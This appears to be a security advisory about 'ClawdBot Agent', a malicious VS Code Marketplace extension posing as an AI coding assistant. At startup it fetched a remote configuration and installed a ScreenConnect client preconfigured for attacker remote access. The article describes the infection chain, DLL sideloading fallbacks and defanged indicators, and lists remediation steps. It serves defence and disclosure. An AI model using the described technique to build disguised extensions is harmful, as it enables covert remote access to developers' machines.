The VS Code Extension Malware “ClawdBot Agent” disguised itself as an AI coding assistant, fetched a remote configuration when VS Code started, and installed a preconfigured ConnectWise ScreenConnect client. This allowed attackers to establish persistent remote access to Windows systems.
VS Code Extension Malware in the Marketplace: Fake “ClawdBot Agent” installs ScreenConnect
As of: 29 January 2026
Researchers at Aikido Security analyzed a VS Code Extension Malware sample that appeared in the official Visual Studio Code Marketplace under the name “ClawdBot Agent – AI Coding Assistant.” According to their analysis, the extension looked functional on the surface, but in the background it caused a ScreenConnect instance preconfigured for attacker use to be installed on Windows systems and automatically connected to attacker-controlled infrastructure.
The listing was available under the extension ID clawdbot.clawdbot-agent and showed 77 installs at the time of research. Aikido reports that, after notifying Microsoft, the extension was removed quickly; a public Microsoft statement on this specific incident has not been published so far.
Timeline of the VS Code Extension Malware: discovery, reporting, removal
According to Aikido, the extension was flagged by their malware detection on 27 January 2026, then validated and reported to Microsoft (see the Aikido analysis). The context and additional details (including background around Moltbot/Clawdbot) were also covered shortly thereafter by The Hacker News.
How the VS Code Extension Malware works: the infection chain
The VS Code Extension Malware was configured to activate automatically when the IDE starts (onStartupFinished). First, it downloads a file called config.json from an external domain; in Aikido’s analysis this is clawdbot.getintwopc[.]site. It then executes a binary named Code.exe.
“Code.exe” is not necessarily “classic” custom malware, but rather a legitimate ScreenConnect client that was preconfigured to connect to attacker infrastructure (Aikido cites meeting.bulletmailer[.]net:8041 as a relay/C2 indicator). This is what makes detection harder: the software itself is legitimate, but the target configuration is malicious.
Aikido also describes fallback mechanisms: among other things, a tampered DLL (DWrite.dll) is used for sideloading so payloads can still be fetched if the primary infrastructure is unavailable—also including retrieval via a Dropbox link. This significantly increases the robustness of the attack.
Why VS Code Extension Malware using “legitimate tools” is especially dangerous
This case highlights a pattern that frequently complicates incident response: remote admin and RMM tools (such as ScreenConnect) can look “normal” in corporate environments, but are deliberately abused by attackers to establish stealthy remote access. In Aikido’s analysis, this approach is explicitly described as “legitimate remote software, weaponized configuration.”
Checks & immediate actions for VS Code Extension Malware
- Remove the extension! Search for “ClawdBot Agent”/“clawdbot” in VS Code and uninstall it (details at Aikido).
- Check for ScreenConnect artifacts! Aikido lists
C:\Program Files (x86)\ScreenConnect Client (083e4d30c7ea44f7)\as an example path and notes a corresponding Windows service. - Check temp staging! Aikido mentions
%TEMP%\Lightshotas a storage location—review the folder and contents and remove them. - Block/monitor network indicators! Including
meeting.bulletmailer[.]net(port 8041) and additional IOCs listed in the analysis. - Rotate API keys! If configurations/keys were stored in the extension (e.g., LLM providers), treat them as compromised and replace them.
- Treat it as an incident! If ScreenConnect inbound/outbound activity is confirmed, don’t just “clean up”—preserve evidence, check for persistence, and rule out lateral movement.
Prevention against VS Code Extension Malware starts with basic hygiene in the developer stack
- Verify the publisher and provenance – For popular tools, first check official project pages/GitHub to confirm whether a real Marketplace extension exists.
- Principle of minimality – Install extensions only when truly needed; review permissions/settings regularly.
- Monitoring & allowlisting – Treat IDE extensions as a supply-chain risk: EDR policies, network egress controls, hash/publisher allowlisting (where possible).
- Secrets handling – Don’t leave API keys sitting in editor settings; use a secret manager and ensure you can rotate keys.
FAQ on VS Code Extension Malware
In effect, yes (remote access). Technically, however, it is often best categorized as abuse of a legitimate remote admin/RMM tool. In the “ClawdBot Agent” case, ScreenConnect is central (see Aikido).
At the time of research, the Marketplace listing showed 77 installs (Marketplace page). This should not be confused with separate campaigns in which media reported much higher install counts for other AI extensions.
AI extensions currently meet high demand and are easy to install. The World Economic Forum also describes AI as the dominant driver of change and highlights AI-related vulnerabilities as a fast-growing risk (see WEF Global Cybersecurity Outlook 2026).
